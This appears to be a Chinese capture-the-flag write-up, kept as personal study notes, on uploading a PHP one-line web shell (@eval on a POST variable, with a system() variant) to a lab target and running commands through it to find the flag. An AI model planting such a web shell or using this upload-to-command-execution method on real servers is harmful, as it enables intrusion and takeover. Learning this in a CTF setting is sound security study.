这是一道上传一句话木马的裸题,解题思路也很明确,现在此详细记录,以供日后复习知识点用
一句话木马:当知道了URL,就可以利用本地一张网页进行连接得到Webshell
php 一句话木马
<?php @eval($_POST["x"]);?>
当这条语句被服务端执行了,我们同时利用 POST 请求上传变量 x 的值,例如 x=echo 'Hello'
php 解析器执行的实质上是 @eval("echo 'Hello'"),即在前端输出一个字符串
更常见的利用手法是利用 @eval(system($_POST["x"])) 直接控制服务端的 shell
同时提交 x=ls ,便可以通过 shell 输出当前网页目录下的其他文件,注入其他命令同理
实操
题目链接
用浏览器连接靶机,有一个可以提交文件的页面,随便 sumbit 一个文本文件
提示:文件已储存在: uploads/xxx.jpg
可以在 ?file=uploads/xxx.jpg 查看,有相应的内容回显
这是一个最普通的 php 脚本,保存改后缀为 .php 尝试上传
<?php echo 'Hello World!'; ?>
在访问时回显 Hello Worl! 说明自定义的 php 脚本被成功执行
把脚本修改成一句话木马
<?php @eval(system($_POST["x"]));?>
成功上传后,访问相应的 ?file=uploads/xxx.jpg,页面空白,说明 php 命令被成功执行
将 url 复制到 Postman ,编辑 Body(Post 的表单)为 x:ls
成功拿到 shell,接下来找到 flag 所在的目录就好了
你甚至可以提交 x:find -name / 'flag' 暴力找,最后提交 cat /flag 拿到 flag